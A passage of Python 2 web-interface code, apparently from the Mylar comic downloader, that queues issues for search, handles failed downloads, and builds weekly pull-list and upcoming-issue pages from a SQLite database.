'issuenumber': ComicIssue,
'booktype': BookType}
elif mode == 'pullwant': #and ComicID is None
#this is for marking individual comics from the pullist to be downloaded.
#--comicid & issueid may both be known (or either) at any given point if alt_pull = 2
#because ComicID and IssueID will both be None due to pullist, it's probably
#better to set both to some generic #, and then filter out later...
IssueDate = pullinfo
try:
SeriesYear = IssueDate[:4]
except:
                SeriesYear = str(now.year)  #fall back to the current year when the pull date can't be parsed
if Publisher == 'COMICS': Publisher = None
moduletype = '[PULL-LIST]'
passinfo = {'issueid': IssueID,
'comicname': ComicName,
'seriesyear': SeriesYear,
'comicid': ComicID,
'issuenumber': ComicIssue,
'booktype': BookType}
elif mode == 'want' or mode == 'want_ann' or manualsearch:
cdname = myDB.selectone("SELECT * from comics where ComicID=?", [ComicID]).fetchone()
ComicName_Filesafe = cdname['ComicName_Filesafe']
SeriesYear = cdname['ComicYear']
AlternateSearch = cdname['AlternateSearch']
Publisher = cdname['ComicPublisher']
UseAFuzzy = cdname['UseFuzzy']
AllowPacks= cdname['AllowPacks']
ComicVersion = cdname['ComicVersion']
ComicName = cdname['ComicName']
TorrentID_32p = cdname['TorrentID_32P']
BookType = cdname['Type']
controlValueDict = {"IssueID": IssueID}
newStatus = {"Status": "Wanted"}
if mode == 'want':
if manualsearch:
logger.info('Initiating manual search for %s issue: %s' % (ComicName, ComicIssue))
else:
logger.info('Marking %s issue: %s as wanted...' % (ComicName, ComicIssue))
myDB.upsert("issues", newStatus, controlValueDict)
else:
annual_name = myDB.selectone("SELECT * FROM annuals WHERE ComicID=? and IssueID=?", [ComicID, IssueID]).fetchone()
if annual_name is None:
logger.fdebug('Unable to locate.')
else:
ComicName = annual_name['ReleaseComicName']
if manualsearch:
logger.info('Initiating manual search for %s : %s' % (ComicName, ComicIssue))
else:
logger.info('Marking %s : %s as wanted...' % (ComicName, ComicIssue))
myDB.upsert("annuals", newStatus, controlValueDict)
moduletype = '[WANTED-SEARCH]'
passinfo = {'issueid': IssueID,
'comicname': ComicName,
'seriesyear': SeriesYear,
'comicid': ComicID,
'issuenumber': ComicIssue,
'booktype': BookType}
if mode == 'want':
issues = myDB.selectone("SELECT IssueDate, ReleaseDate FROM issues WHERE IssueID=?", [IssueID]).fetchone()
elif mode == 'want_ann':
issues = myDB.selectone("SELECT IssueDate, ReleaseDate FROM annuals WHERE IssueID=?", [IssueID]).fetchone()
if ComicYear == None:
ComicYear = str(issues['IssueDate'])[:4]
if issues['ReleaseDate'] is None or issues['ReleaseDate'] == '0000-00-00':
logger.info('No Store Date found for given issue. This is probably due to not Refreshing the Series beforehand.')
logger.info('I Will assume IssueDate as Store Date, but you should probably Refresh the Series and try again if required.')
storedate = issues['IssueDate']
else:
storedate = issues['ReleaseDate']
if BookType == 'TPB':
logger.info('%s[%s] Now Queueing %s (%s) for search' % (moduletype, BookType, ComicName, SeriesYear))
elif ComicIssue is None:
logger.info('%s Now Queueing %s (%s) for search' % (moduletype, ComicName, SeriesYear))
else:
logger.info('%s Now Queueing %s (%s) #%s for search' % (moduletype, ComicName, SeriesYear, ComicIssue))
#s = mylar.SEARCH_QUEUE.put({'issueid': IssueID, 'comicname': ComicName, 'seriesyear': SeriesYear, 'comicid': ComicID, 'issuenumber': ComicIssue, 'booktype': BookType})
s = mylar.SEARCH_QUEUE.put(passinfo)
if manualsearch:
# if it's a manual search, return to null here so the thread will die and not cause http redirect errors.
return
if ComicID:
return cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % ComicID)
else:
return
#raise cherrypy.HTTPRedirect(redirect)
queueissue.exposed = True
def unqueueissue(self, IssueID, ComicID, ComicName=None, Issue=None, FutureID=None, mode=None, ReleaseComicID=None):
myDB = db.DBConnection()
if ComicName is None:
if ReleaseComicID is None: #ReleaseComicID is used for annuals.
issue = myDB.selectone('SELECT * FROM issues WHERE IssueID=?', [IssueID]).fetchone()
else:
issue = None
annchk = 'no'
if issue is None:
if mylar.CONFIG.ANNUALS_ON:
if ReleaseComicID is None:
issann = myDB.selectone('SELECT * FROM annuals WHERE IssueID=?', [IssueID]).fetchone()
else:
issann = myDB.selectone('SELECT * FROM annuals WHERE IssueID=? AND ReleaseComicID=?', [IssueID, ReleaseComicID]).fetchone()
ComicName = issann['ReleaseComicName']
IssueNumber = issann['Issue_Number']
annchk = 'yes'
ComicID = issann['ComicID']
ReleaseComicID = issann['ReleaseComicID']
else:
ComicName = issue['ComicName']
IssueNumber = issue['Issue_Number']
controlValueDict = {"IssueID": IssueID}
if mode == 'failed' and mylar.CONFIG.FAILED_DOWNLOAD_HANDLING:
logger.info(u"Marking " + ComicName + " issue # " + IssueNumber + " as Failed...")
newValueDict = {"Status": "Failed"}
myDB.upsert("failed", newValueDict, controlValueDict)
if annchk == 'yes':
myDB.upsert("annuals", newValueDict, controlValueDict)
else:
myDB.upsert("issues", newValueDict, controlValueDict)
self.failed_handling(ComicID=ComicID, IssueID=IssueID)
else:
logger.info(u"Marking " + ComicName + " issue # " + IssueNumber + " as Skipped...")
newValueDict = {"Status": "Skipped"}
if annchk == 'yes':
myDB.upsert("annuals", newValueDict, controlValueDict)
else:
myDB.upsert("issues", newValueDict, controlValueDict)
else:
#if ComicName is not None, then it's from the FuturePull list that we're 'unwanting' an issue.
#ComicID may be present if it's a watch from the Watchlist, otherwise it won't exist.
if ComicID is not None and ComicID != 'None':
logger.info('comicid present:' + str(ComicID))
thefuture = myDB.selectone('SELECT * FROM future WHERE ComicID=?', [ComicID]).fetchone()
else:
logger.info('FutureID: ' + str(FutureID))
logger.info('no comicid - ComicName: ' + str(ComicName) + ' -- Issue: #' + Issue)
thefuture = myDB.selectone('SELECT * FROM future WHERE FutureID=?', [FutureID]).fetchone()
if thefuture is None:
logger.info('Cannot find the corresponding issue in the Futures List for some reason. This is probably an Error.')
else:
logger.info('Marking ' + thefuture['COMIC'] + ' issue # ' + thefuture['ISSUE'] + ' as skipped...')
if ComicID is not None and ComicID != 'None':
cVDict = {"ComicID": thefuture['ComicID']}
else:
cVDict = {"FutureID": thefuture['FutureID']}
nVDict = {"Status": "Skipped"}
logger.info('cVDict:' + str(cVDict))
logger.info('nVDict:' + str(nVDict))
myDB.upsert("future", nVDict, cVDict)
unqueueissue.exposed = True
def failed_handling(self, ComicID, IssueID):
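        #push the issue through the FailedProcessor; if it comes back flagged as 'retry', requeue the search for the issue (or annual).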
import Queue
queue = Queue.Queue()
FailProcess = Failed.FailedProcessor(issueid=IssueID, comicid=ComicID, queue=queue)
thread_ = threading.Thread(target=FailProcess.Process, name="FAILED Post-Processing")
thread_.start()
thread_.join()
failchk = queue.get()
if failchk[0]['mode'] == 'retry':
logger.info('Attempting to return to search module with ' + str(failchk[0]['issueid']))
if failchk[0]['annchk'] == 'no': mode = 'want'
else: mode = 'want_ann'
self.queueit(mode=mode, ComicName=failchk[0]['comicname'], ComicIssue=failchk[0]['issuenumber'], ComicID=failchk[0]['comicid'], IssueID=failchk[0]['issueid'], manualsearch=True)
elif failchk[0]['mode'] == 'stop':
pass
else:
logger.error('mode is unsupported: ' + failchk[0]['mode'])
failed_handling.exposed = True
def archiveissue(self, IssueID, comicid):
myDB = db.DBConnection()
issue = myDB.selectone('SELECT * FROM issues WHERE IssueID=?', [IssueID]).fetchone()
annchk = 'no'
if issue is None:
if mylar.CONFIG.ANNUALS_ON:
issann = myDB.selectone('SELECT * FROM annuals WHERE IssueID=?', [IssueID]).fetchone()
comicname = issann['ReleaseComicName']
issue = issann['Issue_Number']
annchk = 'yes'
comicid = issann['ComicID']
else:
comicname = issue['ComicName']
issue = issue['Issue_Number']
logger.info(u"Marking " + comicname + " issue # " + str(issue) + " as archived...")
controlValueDict = {'IssueID': IssueID}
newValueDict = {'Status': 'Archived'}
if annchk == 'yes':
myDB.upsert("annuals", newValueDict, controlValueDict)
else:
myDB.upsert("issues", newValueDict, controlValueDict)
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
archiveissue.exposed = True
def pullSearch(self, week, year):
myDB = db.DBConnection()
#retrieve a list of all the issues that are in a Wanted state from the pull that we can search for.
ps = myDB.select("SELECT * from weekly WHERE Status='Wanted' AND weeknumber=? AND year=?", [int(week), year])
if ps is None:
logger.info('No items are marked as Wanted on the pullist to be searched for at this time')
return
issuesToSearch = []
for p in ps:
if p['IssueID'] is not None:
issuesToSearch.append(p['IssueID'])
if len(issuesToSearch) > 0:
logger.info('Now force searching for ' + str(len(issuesToSearch)) + ' issues from the pullist for week ' + str(week))
threading.Thread(target=search.searchIssueIDList, args=[issuesToSearch]).start()
else:
            logger.info('Issues are marked as Wanted, but no issue information is available yet so I cannot search for anything. Try recreating the pullist if you think this is an error.')
return
pullSearch.exposed = True
def pullist(self, week=None, year=None, generateonly=False, current=None):
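        #render the weekly pull-list page: repopulate the week's data if it's missing, flag what is already on the
        #watchlist / one-off list, and surface any previously snatched torrents so they can be re-grabbed manually.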
myDB = db.DBConnection()
autowant = []
if generateonly is False:
autowants = myDB.select("SELECT * FROM futureupcoming WHERE Status='Wanted'")
if autowants:
for aw in autowants:
autowant.append({"ComicName": aw['ComicName'],
"IssueNumber": aw['IssueNumber'],
"Publisher": aw['Publisher'],
"Status": aw['Status'],
"DisplayComicName": aw['DisplayComicName']})
weeklyresults = []
wantedcount = 0
weekinfo = helpers.weekly_info(week, year, current)
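        #weekly_info resolves the requested week/year (or the current week) into the week number, folder name and date boundaries.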
popit = myDB.select("SELECT * FROM sqlite_master WHERE name='weekly' and type='table'")
if popit:
w_results = myDB.select("SELECT * from weekly WHERE weeknumber=? AND year=?", [int(weekinfo['weeknumber']),weekinfo['year']])
if len(w_results) == 0:
logger.info('trying to repopulate to week: ' + str(weekinfo['weeknumber']) + '-' + str(weekinfo['year']))
repoll = self.manualpull(weeknumber=weekinfo['weeknumber'],year=weekinfo['year'])
if repoll['status'] == 'success':
w_results = myDB.select("SELECT * from weekly WHERE weeknumber=? AND year=?", [int(weekinfo['weeknumber']),weekinfo['year']])
else:
logger.warn('Problem repopulating the pullist for week ' + str(weekinfo['weeknumber']) + ', ' + str(weekinfo['year']))
if mylar.CONFIG.ALT_PULL == 2:
logger.warn('Attempting to repoll against legacy pullist in order to have some kind of updated listing for the week.')
repoll = self.manualpull()
if repoll['status'] == 'success':
w_results = myDB.select("SELECT * from weekly WHERE weeknumber=? AND year=?", [int(weekinfo['weeknumber']),weekinfo['year']])
else:
                            logger.warn('Unable to populate the pull-list. Not continuing at this time (will try again in a bit)')
if all([w_results is None, generateonly is False]):
return serve_template(templatename="weeklypull.html", title="Weekly Pull", weeklyresults=weeklyresults, pullfilter=True, weekfold=weekinfo['week_folder'], wantedcount=0, weekinfo=weekinfo)
watchlibrary = helpers.listLibrary()
issueLibrary = helpers.listIssues(weekinfo['weeknumber'], weekinfo['year'])
oneofflist = helpers.listoneoffs(weekinfo['weeknumber'], weekinfo['year'])
chklist = []
for weekly in w_results:
xfound = False
tmp_status = weekly['Status']
if weekly['ComicID'] in watchlibrary:
haveit = watchlibrary[weekly['ComicID']]['comicid']
if weekinfo['weeknumber']:
if watchlibrary[weekly['ComicID']]['status'] == 'Paused':
tmp_status = 'Paused'
elif any([week >= int(weekinfo['weeknumber']), week is None]) and all([mylar.CONFIG.AUTOWANT_UPCOMING, tmp_status == 'Skipped']):
tmp_status = 'Wanted'
for x in issueLibrary:
if weekly['IssueID'] == x['IssueID'] and tmp_status != 'Paused':
xfound = True
tmp_status = x['Status']
break
else:
xlist = [x['Status'] for x in oneofflist if x['IssueID'] == weekly['IssueID']]
if xlist:
haveit = 'OneOff'
tmp_status = xlist[0]
else:
haveit = "No"
linkit = None
if all([weekly['ComicID'] is not None, weekly['ComicID'] != '', haveit == 'No']) or haveit == 'OneOff':
linkit = 'http://comicvine.gamespot.com/volume/4050-' + str(weekly['ComicID'])
else:
#setting it here will force it to set the link to the right comicid regardless of annuals or not
linkit = haveit
x = None
try:
x = float(weekly['ISSUE'])
except ValueError, e:
                    if any(xt in weekly['ISSUE'].lower() for xt in ('au', 'ai', '.inh', '.now', '.mu', '.hu')):
x = weekly['ISSUE']
                if x is not None:
                    #AUTOWANT is flagged when the series name matches one of the 'Watch For' future entries.
                    autowant_flag = any(aw['ComicName'].lower() == weekly['COMIC'].lower() for aw in autowant)
                    weeklyresults.append({
                                   "PUBLISHER": weekly['PUBLISHER'],
                                   "ISSUE": weekly['ISSUE'],
                                   "COMIC": weekly['COMIC'],
                                   "STATUS": tmp_status,
                                   "COMICID": weekly['ComicID'],
                                   "ISSUEID": weekly['IssueID'],
                                   "VOLUME": weekly['volume'],
                                   "SERIESYEAR": weekly['seriesyear'],
                                   "HAVEIT": haveit,
                                   "LINK": linkit,
                                   "HASH": None,
                                   "AUTOWANT": autowant_flag,
                                   "FORMAT": weekly['format']
                                  })
if tmp_status == 'Wanted':
wantedcount +=1
elif tmp_status == 'Snatched':
chklist.append(str(weekly['IssueID']))
weeklyresults = sorted(weeklyresults, key=itemgetter('PUBLISHER', 'COMIC'), reverse=False)
else:
self.manualpull()
if generateonly is True:
return weeklyresults, weekinfo
else:
endresults = []
if len(chklist) > 0:
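                #chklist holds this week's Snatched issues - match them against torrent snatches (32P/WWT/DEM) that never
                #got post-processed, so the template can surface a hash for manual auto-snatch retrieval.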
for genlist in helpers.chunker(chklist, 200):
tmpsql = "SELECT * FROM snatched where Status='Snatched' and status != 'Post-Processed' and (provider='32P' or Provider='WWT' or Provider='DEM') AND IssueID in ({seq})".format(seq=','.join(['?'] *(len(genlist))))
chkthis = myDB.select(tmpsql, genlist)
if chkthis is None:
continue
else:
for w in weeklyresults:
weekit = w
snatchit = [x['hash'] for x in chkthis if w['ISSUEID'] == x['IssueID']]
try:
if snatchit:
logger.fdebug('[%s] Discovered previously snatched torrent not downloaded. Marking for manual auto-snatch retrieval: %s' % (w['COMIC'], ''.join(snatchit)))
weekit['HASH'] = ''.join(snatchit)
else:
weekit['HASH'] = None
except:
weekit['HASH'] = None
endresults.append(weekit)
weeklyresults = endresults
            return serve_template(templatename="weeklypull.html", title="Weekly Pull", weeklyresults=weeklyresults, pullfilter=True, weekfold=weekinfo['week_folder'], wantedcount=wantedcount, weekinfo=weekinfo)
pullist.exposed = True
def removeautowant(self, comicname, release):
myDB = db.DBConnection()
logger.fdebug('Removing ' + comicname + ' from the auto-want list.')
myDB.action("DELETE FROM futureupcoming WHERE ComicName=? AND IssueDate=? AND Status='Wanted'", [comicname, release])
removeautowant.exposed = True
def futurepull(self):
from mylar import solicit
#get month-year here, and self-populate in future
now = datetime.datetime.now()
if len(str(now.month)) != 2:
month = '0' + str(now.month)
else:
month = str(now.month)
year = str(now.year)
logger.fdebug('month = ' + str(month))
logger.fdebug('year = ' + str(year))
threading.Thread(target=solicit.solicit, args=[month, year]).start()
raise cherrypy.HTTPRedirect("futurepulllist")
futurepull.exposed = True
def futurepulllist(self):
myDB = db.DBConnection()
futureresults = []
watchresults = []
popthis = myDB.select("SELECT * FROM sqlite_master WHERE name='futureupcoming' and type='table'")
if popthis:
l_results = myDB.select("SELECT * FROM futureupcoming WHERE Status='Wanted'")
for lres in l_results:
watchresults.append({
"ComicName": lres['ComicName'],
"IssueNumber": lres['IssueNumber'],
"ComicID": lres['ComicID'],
"IssueDate": lres['IssueDate'],
"Publisher": lres['Publisher'],
"Status": lres['Status']
})
logger.fdebug('There are ' + str(len(watchresults)) + ' issues that you are watching for but are not on your watchlist yet.')
popit = myDB.select("SELECT * FROM sqlite_master WHERE name='future' and type='table'")
if popit:
f_results = myDB.select("SELECT SHIPDATE, PUBLISHER, ISSUE, COMIC, EXTRA, STATUS, ComicID, FutureID from future")
for future in f_results:
x = None
if future['ISSUE'] is None: break
try:
x = float(future['ISSUE'])
except ValueError, e:
                    if any(xt in future['ISSUE'].lower() for xt in ('au', 'ai', '.inh', '.now', '.mu', '.hu')):
x = future['ISSUE']
if future['EXTRA'] == 'N/A' or future['EXTRA'] == '':
future_extra = ''
else:
future_extra = future['EXTRA']
if '(of' in future['EXTRA'].lower():
future_extra = re.sub('[\(\)]', '', future['EXTRA'])
if x is not None:
#here we check the status to make sure it's ok since we loaded all the Watch For earlier.
chkstatus = future['STATUS']
for wr in watchresults:
if wr['ComicName'] == future['COMIC'] and wr['IssueNumber'] == future['ISSUE']:
logger.info('matched on Name: ' + wr['ComicName'] + ' to ' + future['COMIC'])
logger.info('matched on Issue: #' + wr['IssueNumber'] + ' to #' + future['ISSUE'])
logger.info('matched on ID: ' + str(wr['ComicID']) + ' to ' + str(future['ComicID']))
chkstatus = wr['Status']
break
futureresults.append({
"SHIPDATE": future['SHIPDATE'],
"PUBLISHER": future['PUBLISHER'],
"ISSUE": future['ISSUE'],
"COMIC": future['COMIC'],
"EXTRA": future_extra,
"STATUS": chkstatus,
"COMICID": future['ComicID'],
"FUTUREID": future['FutureID']
})
futureresults = sorted(futureresults, key=itemgetter('SHIPDATE', 'PUBLISHER', 'COMIC'), reverse=False)
else:
logger.error('No results to post for upcoming issues...something is probably wrong')
return
return serve_template(templatename="futurepull.html", title="future Pull", futureresults=futureresults, pullfilter=True)
futurepulllist.exposed = True
def add2futurewatchlist(self, ComicName, Issue, Publisher, ShipDate, weeknumber, year, FutureID=None):
#ShipDate is just weekinfo['midweek'] #a tuple ('weeknumber','startweek','midweek','endweek','year')
myDB = db.DBConnection()
logger.info(ShipDate)
if FutureID is not None:
            chkfuture = myDB.selectone('SELECT * FROM futureupcoming WHERE ComicName=? AND IssueNumber=? AND weeknumber=? AND year=?', [ComicName, Issue, weeknumber, year]).fetchone()
if chkfuture is not None:
logger.info('Already on Future Upcoming list - not adding at this time.')
return
logger.info('Adding ' + ComicName + ' # ' + str(Issue) + ' [' + Publisher + '] to future upcoming watchlist')
newCtrl = {"ComicName": ComicName,
"IssueNumber": Issue,
"Publisher": Publisher}
newVal = {"Status": "Wanted",
"IssueDate": ShipDate,
"weeknumber": weeknumber,
"year": year}
myDB.upsert("futureupcoming", newVal, newCtrl)
if FutureID is not None:
fCtrl = {"FutureID": FutureID}
fVal = {"Status": "Wanted"}
myDB.upsert("future", fVal, fCtrl)
add2futurewatchlist.exposed = True
def future_check(self):
weeklypull.future_check()
raise cherrypy.HTTPRedirect("upcoming")
future_check.exposed = True
def filterpull(self):
myDB = db.DBConnection()
weeklyresults = myDB.select("SELECT * from weekly")
pulldate = myDB.selectone("SELECT * from weekly").fetchone()
if pulldate is None:
raise cherrypy.HTTPRedirect("home")
return serve_template(templatename="weeklypull.html", title="Weekly Pull", weeklyresults=weeklyresults, pulldate=pulldate['SHIPDATE'], pullfilter=True)
filterpull.exposed = True
def manualpull(self,weeknumber=None,year=None):
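        #repopulate the pull-list: use the locg service when alt_pull is 2 and a week is supplied, otherwise fall back to the legacy flat-file parser.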
logger.info('ALT_PULL: ' + str(mylar.CONFIG.ALT_PULL) + ' PULLBYFILE: ' + str(mylar.PULLBYFILE) + ' week: ' + str(weeknumber) + ' year: ' + str(year))
if all([mylar.CONFIG.ALT_PULL == 2, mylar.PULLBYFILE is False]) and weeknumber:
return mylar.locg.locg(weeknumber=weeknumber,year=year)
#raise cherrypy.HTTPRedirect("pullist?week=" + str(weeknumber) + "&year=" + str(year))
else:
weeklypull.pullit()
return {'status' : 'success'}
manualpull.exposed = True
def pullrecreate(self, weeknumber=None, year=None):
myDB = db.DBConnection()
forcecheck = 'yes'
if weeknumber is None:
myDB.action("DROP TABLE weekly")
mylar.dbcheck()
logger.info("Deleted existing pull-list data. Recreating Pull-list...")
else:
myDB.action('DELETE FROM weekly WHERE weeknumber=? and year=?', [int(weeknumber), int(year)])
logger.info("Deleted existing pull-list data for week %s, %s. Now Recreating the Pull-list..." % (weeknumber, year))
weeklypull.pullit(forcecheck, weeknumber, year)
weeklypull.future_check()
pullrecreate.exposed = True
def upcoming(self):
todaydate = datetime.datetime.today()
current_weeknumber = todaydate.strftime("%U")
#find the given week number for the current day
weeknumber = current_weeknumber
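        #derive the boundaries of the current pull week: startweek is the Sunday starting the week, midweek the Wednesday (used as the ship date), endweek the Saturday.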
stweek = datetime.datetime.strptime(todaydate.strftime('%Y-%m-%d'), '%Y-%m-%d')
startweek = stweek - timedelta(days = (stweek.weekday() + 1) % 7)
midweek = startweek + timedelta(days = 3)
endweek = startweek + timedelta(days = 6)
weekyear = todaydate.strftime("%Y")
myDB = db.DBConnection()
#upcoming = myDB.select("SELECT * from issues WHERE ReleaseDate > date('now') order by ReleaseDate DESC")
#upcomingdata = myDB.select("SELECT * from upcoming WHERE IssueID is NULL AND IssueNumber is not NULL AND ComicName is not NULL order by IssueDate DESC")
#upcomingdata = myDB.select("SELECT * from upcoming WHERE IssueNumber is not NULL AND ComicName is not NULL order by IssueDate DESC")
upcomingdata = myDB.select("SELECT * from weekly WHERE Issue is not NULL AND Comic is not NULL order by weeknumber DESC")
if upcomingdata is None:
logger.info('No upcoming data as of yet...')
else:
futureupcoming = []
upcoming = []
upcoming_count = 0
futureupcoming_count = 0
#try:
# pull_date = myDB.selectone("SELECT SHIPDATE from weekly").fetchone()
# if (pull_date is None):
# pulldate = '00000000'
# else:
# pulldate = pull_date['SHIPDATE']
#except (sqlite3.OperationalError, TypeError), msg:
# logger.info(u"Error Retrieving weekly pull list - attempting to adjust")
# pulldate = '00000000'
for upc in upcomingdata:
# if len(upc['IssueDate']) <= 7:
# #if it's less than or equal 7, then it's a future-pull so let's check the date and display
# #tmpdate = datetime.datetime.com
# tmpdatethis = upc['IssueDate']
# if tmpdatethis[:2] == '20':
# tmpdate = tmpdatethis + '01' #in correct format of yyyymm
# else:
# findst = tmpdatethis.find('-') #find the '-'
# tmpdate = tmpdatethis[findst +1:] + tmpdatethis[:findst] + '01' #rebuild in format of yyyymm
# #timenow = datetime.datetime.now().strftime('%Y%m')
# else:
# #if it's greater than 7 it's a full date.
# tmpdate = re.sub("[^0-9]", "", upc['IssueDate']) #convert date to numerics only (should be in yyyymmdd)
# timenow = datetime.datetime.now().strftime('%Y%m%d') #convert to yyyymmdd
# #logger.fdebug('comparing pubdate of: ' + str(tmpdate) + ' to now date of: ' + str(timenow))
# pulldate = re.sub("[^0-9]", "", pulldate) #convert pulldate to numerics only (should be in yyyymmdd)
# if int(tmpdate) >= int(timenow) and int(tmpdate) == int(pulldate): #int(pulldate) <= int(timenow):
mylar.WANTED_TAB_OFF = False
try:
ab = int(upc['weeknumber'])
bc = int(upc['year'])
except TypeError:
logger.warn('Weekly Pull hasn\'t finished being generated as of yet (or has yet to initialize). Try to wait up to a minute to accommodate processing.')
mylar.WANTED_TAB_OFF = True
myDB.action("DROP TABLE weekly")
mylar.dbcheck()
logger.info("Deleted existing pull-list data. Recreating Pull-list...")
forcecheck = 'yes'
return threading.Thread(target=weeklypull.pullit, args=[forcecheck]).start()
if int(upc['weeknumber']) == int(weeknumber) and int(upc['year']) == int(weekyear):
if upc['Status'] == 'Wanted':
upcoming_count +=1
upcoming.append({"ComicName": upc['Comic'],
"IssueNumber": upc['Issue'],
"IssueDate": upc['ShipDate'],
"ComicID": upc['ComicID'],
"IssueID": upc['IssueID'],
"Status": upc['Status'],
"WeekNumber": upc['weeknumber'],
"DynamicName": upc['DynamicName']})
else:
if int(upc['weeknumber']) > int(weeknumber) and upc['Status'] == 'Wanted':
futureupcoming_count +=1
futureupcoming.append({"ComicName": upc['Comic'],
"IssueNumber": upc['Issue'],
"IssueDate": upc['ShipDate'],
"ComicID": upc['ComicID'],
"IssueID": upc['IssueID'],
"Status": upc['Status'],
"WeekNumber": upc['weeknumber'],
"DynamicName": upc['DynamicName']})
# elif int(tmpdate) >= int(timenow):
# if len(upc['IssueDate']) <= 7:
# issuedate = tmpdate[:4] + '-' + tmpdate[4:6] + '-00'
# else:
# issuedate = upc['IssueDate']
# if upc['Status'] == 'Wanted':
# futureupcoming_count +=1
# futureupcoming.append({"ComicName": upc['ComicName'],
# "IssueNumber": upc['IssueNumber'],
# "IssueDate": issuedate,
# "ComicID": upc['ComicID'],
# "IssueID": upc['IssueID'],
# "Status": upc['Status'],
# "DisplayComicName": upc['DisplayComicName']})
futureupcoming = sorted(futureupcoming, key=itemgetter('IssueDate', 'ComicName', 'IssueNumber'), reverse=True)
#fix None DateAdded points here
helpers.DateAddedFix()
issues = myDB.select("SELECT * from issues WHERE Status='Wanted'")
if mylar.CONFIG.UPCOMING_STORYARCS is True:
arcs = myDB.select("SELECT * from storyarcs WHERE Status='Wanted'")
else:
arcs = []
if mylar.CONFIG.UPCOMING_SNATCHED is True:
issues += myDB.select("SELECT * from issues WHERE Status='Snatched'")
if mylar.CONFIG.UPCOMING_STORYARCS is True:
arcs += myDB.select("SELECT * from storyarcs WHERE Status='Snatched'")
if mylar.CONFIG.FAILED_DOWNLOAD_HANDLING is True:
issues += myDB.select("SELECT * from issues WHERE Status='Failed'")
if mylar.CONFIG.UPCOMING_STORYARCS is True:
arcs += myDB.select("SELECT * from storyarcs WHERE Status='Failed'")
if mylar.CONFIG.UPCOMING_STORYARCS is True:
issues += arcs
isCounts = {}
isCounts[1] = 0 #1 wanted
isCounts[2] = 0 #2 snatched
isCounts[3] = 0 #3 failed
isCounts[4] = 0 #4 wantedTier
ann_list = []
ann_cnt = 0
if mylar.CONFIG.ANNUALS_ON:
#let's add the annuals to the wanted table so people can see them
#ComicName wasn't present in db initially - added on startup chk now.
annuals_list = myDB.select("SELECT * FROM annuals WHERE Status='Wanted'")
if mylar.CONFIG.UPCOMING_SNATCHED:
annuals_list += myDB.select("SELECT * FROM annuals WHERE Status='Snatched'")
if mylar.CONFIG.FAILED_DOWNLOAD_HANDLING:
annuals_list += myDB.select("SELECT * FROM annuals WHERE Status='Failed'")
# anncnt = myDB.select("SELECT COUNT(*) FROM annuals WHERE Status='Wanted' OR Status='Snatched'")
# ann_cnt = anncnt[0][0]
ann_list += annuals_list
issues += annuals_list
issues_tmp = sorted(issues, key=itemgetter('ReleaseDate'), reverse=True)
issues_tmp1 = sorted(issues_tmp, key=itemgetter('DateAdded'), reverse=True)
issues = sorted(issues_tmp1, key=itemgetter('Status'), reverse=True)
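#sorting three times relies on Python's stable sort: the final list is ordered primarily by Status,
#with DateAdded and then ReleaseDate breaking ties (all descending).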
for curResult in issues:
baseissues = {'wanted': 1, 'snatched': 2, 'failed': 3}
for seas in baseissues:
if curResult['Status'] is None:
continue
else:
if seas in curResult['Status'].lower():
if all([curResult['DateAdded'] <= mylar.SEARCH_TIER_DATE, curResult['Status'] == 'Wanted']):
isCounts[4]+=1
else:
sconv = baseissues[seas]
isCounts[sconv]+=1
continue
isCounts = {"Wanted": str(isCounts[1]),
"Snatched": str(isCounts[2]),
"Failed": str(isCounts[3]),
"StoryArcs": str(len(arcs)),
"WantedTier": str(isCounts[4])}
iss_cnt = int(isCounts['Wanted'])
wantedcount = iss_cnt + int(isCounts['WantedTier']) # + ann_cnt
#let's straightload the series that have no issue data associated as of yet (ie. new series) from the futurepulllist
future_nodata_upcoming = myDB.select("SELECT * FROM futureupcoming WHERE IssueNumber='1' OR IssueNumber='0'")
#let's move any items from the upcoming table into the wanted table if the date has already passed.
#gather the list...
mvupcome = myDB.select("SELECT * from upcoming WHERE IssueDate < date('now') order by IssueDate DESC")
#get the issue ID's
for mvup in mvupcome:
myissue = myDB.selectone("SELECT ComicName, Issue_Number, IssueID, ComicID FROM issues WHERE IssueID=?", [mvup['IssueID']]).fetchone()
#myissue = myDB.action("SELECT * FROM issues WHERE Issue_Number=?", [mvup['IssueNumber']]).fetchone()
if myissue is None: pass
else:
logger.fdebug("--Updating Status of issues table because of Upcoming status--")
logger.fdebug("ComicName: " + str(myissue['ComicName']))
logger.fdebug("Issue number : " + str(myissue['Issue_Number']))
mvcontroldict = {"IssueID": myissue['IssueID']}
mvvalues = {"ComicID": myissue['ComicID'],
"Status": "Wanted"}
myDB.upsert("issues", mvvalues, mvcontroldict)
#remove old entry from upcoming so it won't try to continually download again.
logger.fdebug('[DELETE] - ' + mvup['ComicName'] + ' issue #: ' + str(mvup['IssueNumber']))
deleteit = myDB.action("DELETE from upcoming WHERE ComicName=? AND IssueNumber=?", [mvup['ComicName'], mvup['IssueNumber']])
return serve_template(templatename="upcoming.html", title="Upcoming", upcoming=upcoming, issues=issues, ann_list=ann_list, futureupcoming=futureupcoming, future_nodata_upcoming=future_nodata_upcoming, futureupcoming_count=futureupcoming_count, upcoming_count=upcoming_count, wantedcount=wantedcount, isCounts=isCounts)
upcoming.exposed = True
def skipped2wanted(self, comicid, fromupdate=None):
# change all issues for a given ComicID that are Skipped, into Wanted.
issuestowanted = []
issuesnumwant = []
myDB = db.DBConnection()
skipped2 = myDB.select("SELECT * from issues WHERE ComicID=? AND Status='Skipped'", [comicid])
for skippy in skipped2:
mvcontroldict = {"IssueID": skippy['IssueID']}
mvvalues = {"Status": "Wanted"}
myDB.upsert("issues", mvvalues, mvcontroldict)
issuestowanted.append(skippy['IssueID'])
issuesnumwant.append(skippy['Issue_Number'])
if len(issuestowanted) > 0:
if fromupdate is None:
logger.info("Marking issues: %s as Wanted" % issuesnumwant)
threading.Thread(target=search.searchIssueIDList, args=[issuestowanted]).start()
else:
logger.info('Marking issues: %s as Wanted' % issuesnumwant)
logger.info('These will be searched for on next Search Scan / Force Check')
return
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
skipped2wanted.exposed = True
def annualDelete(self, comicid, ReleaseComicID=None):
myDB = db.DBConnection()
if ReleaseComicID is None:
myDB.action("DELETE FROM annuals WHERE ComicID=?", [comicid])
logger.fdebug("Deleted all annuals from DB for ComicID of " + str(comicid))
else:
myDB.action("DELETE FROM annuals WHERE ReleaseComicID=?", [ReleaseComicID])
logger.fdebug("Deleted selected annual from DB with a ComicID of " + str(ReleaseComicID))
